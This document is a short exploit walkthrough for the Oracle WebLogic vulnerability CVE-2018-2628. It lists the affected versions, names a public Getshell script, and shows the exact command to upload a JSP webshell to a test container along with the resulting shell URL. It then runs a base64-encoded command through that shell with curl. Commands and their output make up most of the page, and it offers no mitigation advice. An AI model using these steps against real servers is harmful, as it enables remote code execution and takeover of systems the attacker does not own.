WebLogic — CVE-2018-2628

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components).

Affected versions: 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3.

PoC

This vulnerability can be exploited using jas502n's script CVE-2018-2628-Getshell.py. A working webshell (to be uploaded) can be found in the referenced repository, though it is large and will be compiled to a smaller shell upon deployment.

Note that the shell is one-time-use only, meaning it will be removed once you execute a command.

Test Environment

Tested on VulnHub's weblogic:10.3.6.0-2017 container:

N/ASH

docker container ls
CONTAINER ID   IMAGE                                    COMMAND             CREATED       STATUS
f3b474a990a1   vulhub/weblogic:10.3.6.0-2017           "startWebLogic.sh"   5 hours ago   Up 5 hours

Usage Example

Upload shell:

N/ASH

python2.7 CVE-2018-2628-Getshell.py 127.0.0.1 7003 shell1.jsp

Output:

N/A

>>>Shell File Upload Dir:  servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\shell1.jsp
>>>Getshell: http://127.0.0.1:7003/bea_wls_internal/shell1.jsp?tom=d2hvYW1pCg==

Execute command (hostname example):

N/ASH

curl http://127.0.0.1:7003/bea_wls_internal/shell1.jsp\?tom\=aG9zdG5hbWU\=

Output:

N/A

->|vuln-weblogic
|<-%

██╗ ██████╗ ███████╗██╗███████╗███╗ ██╗██████╗ ██║██╔═══██╗██╔════╝██║██╔════╝████╗ ██║██╔══██╗ ██║██║ ██║█████╗ ██║█████╗ ██╔██╗ ██║██║ ██║ ██║██║ ██║██╔══╝ ██║██╔══╝ ██║╚██╗██║██║ ██║ ██║╚██████╔╝██║ ██║███████╗██║ ╚████║██████╔╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═══╝╚═════╝